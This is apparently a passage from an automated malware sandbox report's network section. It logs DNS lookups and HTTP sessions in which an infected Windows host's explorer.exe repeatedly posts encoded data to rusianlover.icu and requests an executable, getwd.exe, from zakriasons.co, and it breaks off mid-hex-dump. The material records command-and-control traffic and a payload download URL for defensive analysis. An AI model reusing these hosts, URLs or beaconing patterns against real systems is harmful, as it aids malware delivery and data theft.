                                        Mar 10, 2021 11:42:52.179197073 CET5046353192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:52.233701944 CET53504638.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:52.728647947 CET5039453192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:52.774983883 CET53503948.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:54.447309971 CET5853053192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:54.506834030 CET53585308.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:55.715934992 CET5381353192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:55.772545099 CET53538138.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:57.311022043 CET6373253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:57.365310907 CET53637328.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:58.461935997 CET5734453192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:58.516541958 CET53573448.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:59.745594025 CET5445053192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:59.791768074 CET53544508.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:00.138197899 CET5926153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:00.195586920 CET53592618.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:03.027340889 CET5715153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:03.081782103 CET53571518.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:05.854348898 CET5941353192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:05.908895969 CET53594138.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:08.675479889 CET6051653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:08.729815960 CET53605168.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:11.481430054 CET5164953192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:11.548894882 CET53516498.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:13.723664999 CET6508653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:13.791376114 CET53650868.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:14.313855886 CET5643253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:14.368622065 CET53564328.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:17.140939951 CET5292953192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:17.195389032 CET53529298.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:19.973582029 CET6431753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:20.028006077 CET53643178.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:23.370452881 CET6100453192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:23.427532911 CET53610048.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:26.230215073 CET5689553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:26.276403904 CET53568958.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:29.049068928 CET6237253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:29.094966888 CET53623728.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:30.636250019 CET6151553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:30.684978008 CET53615158.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:30.967895985 CET5667553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:31.033087969 CET53566758.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:31.855731964 CET5717253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:31.913132906 CET53571728.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:34.620337009 CET5526753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:34.668447018 CET53552678.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:34.693445921 CET5096953192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:34.739461899 CET53509698.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:37.497648001 CET6436253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:37.547091961 CET53643628.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:41.002331018 CET5476653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:41.059139013 CET53547668.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:43.899296999 CET6144653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:43.956202030 CET53614468.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:46.781203985 CET5751553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:46.827439070 CET53575158.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:49.630826950 CET5819953192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:49.679625988 CET53581998.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:52.461114883 CET6522153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:52.507015944 CET53652218.8.8.8192.168.2.5
                                        Mar 10, 2021 11:43:55.287610054 CET6157353192.168.2.58.8.8.8
                                        Mar 10, 2021 11:43:55.333604097 CET53615738.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:27.637350082 CET5656253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:27.694957972 CET53565628.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:28.357337952 CET5359153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:28.414832115 CET53535918.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:28.914798975 CET5968853192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:28.969268084 CET53596888.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:30.078682899 CET5603253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:30.137583017 CET53560328.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:30.645231009 CET6115053192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:30.706602097 CET53611508.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:31.198295116 CET6345853192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:31.279067039 CET53634588.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:31.886809111 CET5042253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:31.932702065 CET53504228.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:32.513427019 CET5324753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:32.605043888 CET53532478.8.8.8192.168.2.5
                                        Mar 10, 2021 11:44:33.546530008 CET5854453192.168.2.58.8.8.8
                                        Mar 10, 2021 11:44:33.605904102 CET53585448.8.8.8192.168.2.5
                                        TimestampSource IPDest IPChecksumCodeType
                                        Mar 10, 2021 11:42:24.226293087 CET192.168.2.58.8.8.8d004(Port unreachable)Destination Unreachable

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Mar 10, 2021 11:42:23.145108938 CET192.168.2.58.8.8.80x7b8dStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:24.146101952 CET192.168.2.58.8.8.80x7b8dStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:27.533092976 CET192.168.2.58.8.8.80x5713Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:29.447962046 CET192.168.2.58.8.8.80xe590Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:29.486794949 CET192.168.2.58.8.8.80x5e74Standard query (0)zakriasons.coA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:33.592852116 CET192.168.2.58.8.8.80x9043Standard query (0)estrelladamm.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:33.909949064 CET192.168.2.58.8.8.80x22d4Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:36.868185997 CET192.168.2.58.8.8.80x868dStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:39.704246998 CET192.168.2.58.8.8.80x7672Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:42.530456066 CET192.168.2.58.8.8.80xc16fStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:45.911041975 CET192.168.2.58.8.8.80xadc8Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:48.731410980 CET192.168.2.58.8.8.80xf032Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:51.556493998 CET192.168.2.58.8.8.80x4eadStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:54.447309971 CET192.168.2.58.8.8.80x1a6dStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:57.311022043 CET192.168.2.58.8.8.80x3659Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:00.138197899 CET192.168.2.58.8.8.80x52a6Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:03.027340889 CET192.168.2.58.8.8.80x1577Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:05.854348898 CET192.168.2.58.8.8.80x2e82Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:08.675479889 CET192.168.2.58.8.8.80x810eStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:11.481430054 CET192.168.2.58.8.8.80xb5c4Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:14.313855886 CET192.168.2.58.8.8.80xbee4Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:17.140939951 CET192.168.2.58.8.8.80xf7cbStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:19.973582029 CET192.168.2.58.8.8.80x2c56Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:23.370452881 CET192.168.2.58.8.8.80x506bStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:26.230215073 CET192.168.2.58.8.8.80x5328Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:29.049068928 CET192.168.2.58.8.8.80x838bStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:31.855731964 CET192.168.2.58.8.8.80x16c4Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:34.693445921 CET192.168.2.58.8.8.80x6aa2Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:37.497648001 CET192.168.2.58.8.8.80xaafdStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:41.002331018 CET192.168.2.58.8.8.80xea82Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:43.899296999 CET192.168.2.58.8.8.80x7a5eStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:46.781203985 CET192.168.2.58.8.8.80x3a3Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:49.630826950 CET192.168.2.58.8.8.80x5c11Standard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:52.461114883 CET192.168.2.58.8.8.80xf2fdStandard query (0)rusianlover.icuA (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:55.287610054 CET192.168.2.58.8.8.80x1897Standard query (0)rusianlover.icuA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Mar 10, 2021 11:42:24.200372934 CET8.8.8.8192.168.2.50x7b8dNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:24.226169109 CET8.8.8.8192.168.2.50x7b8dNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:27.590620995 CET8.8.8.8192.168.2.50x5713No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:29.503112078 CET8.8.8.8192.168.2.50xe590No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:29.548923969 CET8.8.8.8192.168.2.50x5e74No error (0)zakriasons.co104.21.55.228A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:29.548923969 CET8.8.8.8192.168.2.50x5e74No error (0)zakriasons.co172.67.173.204A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:33.925044060 CET8.8.8.8192.168.2.50x9043No error (0)estrelladamm.icu8.210.47.214A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:33.970722914 CET8.8.8.8192.168.2.50x22d4No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:36.922789097 CET8.8.8.8192.168.2.50x868dNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:39.761579037 CET8.8.8.8192.168.2.50x7672No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:42.584700108 CET8.8.8.8192.168.2.50xc16fNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:45.965420008 CET8.8.8.8192.168.2.50xadc8No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:48.790709972 CET8.8.8.8192.168.2.50xf032No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:51.610935926 CET8.8.8.8192.168.2.50x4eadNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:54.506834030 CET8.8.8.8192.168.2.50x1a6dNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:42:57.365310907 CET8.8.8.8192.168.2.50x3659No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:00.195586920 CET8.8.8.8192.168.2.50x52a6No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:03.081782103 CET8.8.8.8192.168.2.50x1577No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:05.908895969 CET8.8.8.8192.168.2.50x2e82No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:08.729815960 CET8.8.8.8192.168.2.50x810eNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:11.548894882 CET8.8.8.8192.168.2.50xb5c4No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:14.368622065 CET8.8.8.8192.168.2.50xbee4No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:17.195389032 CET8.8.8.8192.168.2.50xf7cbNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:20.028006077 CET8.8.8.8192.168.2.50x2c56No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:23.427532911 CET8.8.8.8192.168.2.50x506bNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:26.276403904 CET8.8.8.8192.168.2.50x5328No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:29.094966888 CET8.8.8.8192.168.2.50x838bNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:31.913132906 CET8.8.8.8192.168.2.50x16c4No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:34.739461899 CET8.8.8.8192.168.2.50x6aa2No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:37.547091961 CET8.8.8.8192.168.2.50xaafdNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:41.059139013 CET8.8.8.8192.168.2.50xea82No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:43.956202030 CET8.8.8.8192.168.2.50x7a5eNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:46.827439070 CET8.8.8.8192.168.2.50x3a3No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:49.679625988 CET8.8.8.8192.168.2.50x5c11No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:52.507015944 CET8.8.8.8192.168.2.50xf2fdNo error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)
                                        Mar 10, 2021 11:43:55.333604097 CET8.8.8.8192.168.2.50x1897No error (0)rusianlover.icu212.114.52.43A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • rusianlover.icu
                                        • zakriasons.co
                                        • estrelladamm.icu

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.549715212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:27.643244982 CET1160OUTPOST /forum/logout.php?page=7 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 1081
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:42:27.732872963 CET1162INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 31 32 63 0d 0a 08 81 c9 2b af 8e dd 14 bb 0f 76 4d 7e a5 75 e6 5c d8 2c 61 86 cb c1 42 a1 fd 81 78 73 f1 d2 f4 d2 01 3c d8 d5 00 50 de 0d a6 56 07 86 40 86 5d 60 b4 6a ec 32 c4 97 f6 0b 8d 84 b0 fb bb 28 20 f2 70 4d 2d fa d7 c4 e6 0c a5 c4 1e 83 2f 5c 82 29 85 32 99 a9 86 3f eb 0e b1 85 a8 6c 98 56 57 d2 c5 cc 2c 31 a2 6a 50 61 57 d1 08 19 df 70 5d 72 bb 8c 57 0f b3 17 65 cd e1 0e b6 05 08 13 eb 4c 59 ba f9 97 0c 6e b0 ed 7d 63 2b 04 db 13 77 22 85 fb f8 d3 6a f9 d6 39 50 24 d8 63 4a da 10 8f 5f de 17 65 44 a6 0b 0e ea 70 5a 81 19 66 cd 17 e2 50 79 ef b8 85 f9 21 89 1d 92 d6 69 5d 7e cf a6 9f 16 a0 40 9f e3 b3 24 6a ef 80 4a 5b a5 ab 69 74 47 b4 48 53 ac 2f be f6 e8 cb ce 5e c2 c0 1b b2 3e e6 79 37 ae bb 80 c1 40 84 8d 81 80 24 34 a8 35 ce f8 a8 03 cd b3 0f f2 d5 4a ff 1c 2a 2c bb 8b 70 d7 82 75 3e db a7 33 08 40 5c 55 9d 8e 19 9f 18 37 8c 72 a6 88 68 0b fa 0f 9e 64 ec 7c d6 f3 3c 5d cc e7 2a 93 3b 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 12c+vM~u\,aBxs<PV@]`j2( pM-/\)2?lVW,1jPaWp]rWeLYn}c+w"j9P$cJ_eDpZfPy!i]~@$jJ[itGHS/^>y7@$45J*,pu>3@\U7rhd|<]*;0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.549716104.21.55.22880C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:29.589483976 CET1163OUTGET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: zakriasons.co
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:42:29.635297060 CET1164INHTTP/1.1 301 Moved Permanently
                                        Date: Wed, 10 Mar 2021 10:42:29 GMT
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Cache-Control: max-age=3600
                                        Expires: Wed, 10 Mar 2021 11:42:29 GMT
                                        Location: https://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe
                                        cf-request-id: 08bd543071000005d0af0dd000000001
                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=92qhQgjQlrtNEAm5h4x68aAKVxl5xZz0aUW7G3Nlh1NqZ2qU5FURM1AossSoU2js7td3%2B1Z8M8jXIOAFs5bt6ruhhNR1g%2F7mlpsgU%2BTE"}],"group":"cf-nel"}
                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 62dbefc719f105d0-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.549732212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:54.231937885 CET5389OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 692
                                        Cache-Control: no-cache
                                        Data Raw: 78 61 64 61 64 67 6a 3d 45 38 33 30 42 44 43 36 43 34 46 37 36 46 33 35 42 35 45 33 39 45 33 31 38 41 37 38 45 32 31 30 32 37 41 30 38 35 31 31 41 35 30 35 42 30 31 34 42 41 34 42 33 45 33 43 36 37 37 46 36 46 36 45 33 46 45 45 30 44 46 32 35 33 26 76 77 78 73 74 3d 36 39 30 34 36 34 34 31 26 7a 65 6a 69 6e 73 78 77 62 3d 30 38 63 30 66 39 37 33 32 65 64 65 63 37 37 64 30 33 64 63 64 65 39 30 65 36 63 38 34 32 35 34 36 35 34 63 37 31 31 35 33 62 63 62 30 39 33 62 30 63 62 63 62 63 39 30 62 36 35 65 62 63 32 35 33 62 34 38 65 37 63 66 63 36 37 63 63 38 31 34 36 32 37 31 32 36 32 37 30 36 35 36 66 36 37 36 35 34 35 62 63 30 38 34 62 32 38 35 30 31 32 35 64 31 62 38 61 39 32 61 65 63 65 39 65 66 39 62 39 35 38 36 34 64 32 66 61 65 33 31 39 64 64 33 62 39 38 36 61 65 32 35 33 33 31 33 31 61 65 34 61 34 64 34 33 39 35 36 33 32 36 32 66 64 66 35 32 64 31 66 61 62 65 65 31 61 31 61 34 33 31 61 66 66 31 35 35 61 38 34 63 35 34 31 33 35 31 37 38 64 61 61 39 37 39 37 31 66 33 33 36 39 62 64 34 33 65 32 33 63 31 31 34 65 61 33 34 39 37 36 37 64 39 66 61 38 30 64 38 34 37 31 66 63 61 32 35 62 65 66 33 65 61 36 39 36 39 66 62 37 37 38 63 66 39 66 39 31 38 35 31 63 32 38 36 66 38 64 33 33 39 38 30 37 38 30 31 65 63 35 34 35 31 35 63 32 61 31 61 35 36 34 32 31 39 36 62 33 63 63 36 64 36 38 36 38 33 33 34 30 39 36 66 37 32 61 35 32 39 33 33 31 62 31 30 36 61 31 39 33 62 64 30 63 64 66 39 61 36 33 30 66 61 31 64 35 36 34 39 37 65 63 64 35 37 36 36 36 64 37 65 64 31 30 65 63 61 33 64 35 36 61 38 39 63 33 39 66 63 62 37 66 36 32 61 34 32 32 33 31 63 31 33 62 31 31 66 61 32 31 63 39 62 64 36 38 34 36 34 31 33 34 34 33 30 64 63 62 37 38 34 32 64 37 64 37 37 63 35 38 34 32 62 35 66 33 39 63 35 39 39 38 36 62 34 35 62 63 34 37 62 31 61 63 38 33 61 34 34 33 63 32 64 30 33 31 38 62 65 37 63 63 38 62 31 30 31 34 64 34 31 66 37 34 33 31 39 63 36 38 66 35 61 30 30 33 65 34 64 64 32 39 30 33 36 33 66 37 33 32 63 33 36 66 63 66 66 64 36 35 32 34 33 34 65 66 63 30 30 63 36 37 37 33 32 39 63 37 64 65 36 64 39 34 31 37 64 32 36 33 64 37 34 33 65 64 39 62 30 62 38 61 35 32
                                        Data Ascii: xadadgj=E830BDC6C4F76F35B5E39E318A78E21027A08511A505B014BA4B3E3C677F6F6E3FEE0DF253&vwxst=69046441&zejinsxwb=08c0f9732edec77d03dcde90e6c84254654c71153bcb093b0cbcbc90b65ebc253b48e7cfc67cc814627126270656f676545bc084b2850125d1b8a92aece9ef9b95864d2fae319dd3b986ae2533131ae4a4d439563262fdf52d1fabee1a1a431aff155a84c54135178daa97971f3369bd43e23c114ea349767d9fa80d8471fca25bef3ea6969fb778cf9f91851c286f8d339807801ec54515c2a1a5642196b3cc6d6868334096f72a529331b106a193bd0cdf9a630fa1d56497ecd57666d7ed10eca3d56a89c39fcb7f62a42231c13b11fa21c9bd68464134430dcb7842d7d77c5842b5f39c59986b45bc47b1ac83a443c2d0318be7cc8b1014d41f74319c68f5a003e4dd290363f732c36fcffd652434efc00c677329c7de6d9417d263d743ed9b0b8a52
                                        Mar 10, 2021 11:42:54.303184986 CET5416INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 80 12 ad 62 ed 09 14 33 e6 27 99 02 07 5c c5 94 27 ad b0 33 b4 d2 3b ee 2f 5b b9 48 9f 67 0d 32 3c b7 25 f2 f1 4f c4 b2 36 63 03 78 24 50 80 18 b5 6c ea b0 e1 fe 9f 20 5a 90 d1 fa f5 ca 52 e1 ed 27 28 36 6b 8d 00 f2 f7 ea 4c de 70 a5 ad a0 a4 90 41 91 96 8c da c8 d6 80 37 7d f1 4c 0e b4 e0 67 97 ec 33 10 cc f7 91 56 4f 82 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6db3'\'3;/[Hg2<%O6cx$Pl ZR'(6kLpA7}Lg3VO0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.549734212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:57.070462942 CET5444OUTPOST /forum/logout.php?page=1 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 635
                                        Cache-Control: no-cache
                                        Data Raw: 73 71 6f 6d 6b 69 61 79 3d 37 32 36 63 39 34 31 65 32 34 35 64 65 39 36 36 64 38 64 65 26 71 6d 69 65 61 77 3d 34 37 33 36 33 31 33 38 26 75 75 75 75 3d 32 36 36 44 44 30 36 43 42 37 42 36 39 43 38 35 43 31 32 34 41 33 31 33 38 30 34 32 38 31 46 35 45 45 31 46 39 36 35 46 32 37 42 46 37 44 46 45 31 39 38 37 35 37 43 42 43 36 43 46 38 45 34 33 41 46 41 41 36 38 34 43 35 41 43 46 30 38 44 35 36 34 37 31 31 35 36 46 39 38 30 38 46 46 36 39 33 30 43 42 39 32 43 36 31 37 45 39 30 33 30 42 31 36 42 31 41 41 45 43 33 33 31 37 30 33 35 32 37 33 33 31 36 38 37 44 31 42 42 35 31 39 35 30 44 33 44 36 37 37 37 32 35 45 32 34 30 36 33 32 34 45 46 37 42 37 38 46 46 34 41 35 32 37 41 38 37 45 42 46 39 44 46 45 35 30 35 39 46 42 33 35 34 38 32 44 39 30 30 31 35 41 32 35 39 41 31 36 38 35 36 37 43 38 32 45 38 35 42 43 32 41 36 37 30 44 46 32 45 46 39 39 31 31 45 36 41 41 45 33 37 37 30 30 31 42 33 35 34 30 41 39 46 38 35 45 38 30 36 37 43 31 42 45 41 31 32 30 34 38 45 35 32 39 45 41 41 46 35 41 46 42 34 35 33 30 42 35 32 32 45 31 33 44 30 35 45 43 39 46 32 36 33 34 41 30 44 38 34 30 38 31 41 39 34 46 42 42 42 39 44 32 41 35 30 32 41 41 37 44 30 41 35 34 32 41 32 32 37 30 34 35 43 46 35 39 46 45 37 38 35 46 36 30 34 39 46 45 41 38 46 34 35 36 38 31 30 38 34 32 30 43 36 33 38 43 35 42 31 44 42 45 42 33 34 46 35 31 46 33 41 37 31 35 44 35 35 33 31 42 38 30 45 45 45 35 45 37 35 30 46 35 41 33 32 37 30 44 32 45 44 34 30 38 42 30 31 34 39 43 30 45 32 46 37 38 31 30 43 34 39 30 30 42 35 43 45 39 30 33 45 37 42 44 43 32 36 41 39 35 30 33 32 32 37 41 46 33 33 41 38 34 38 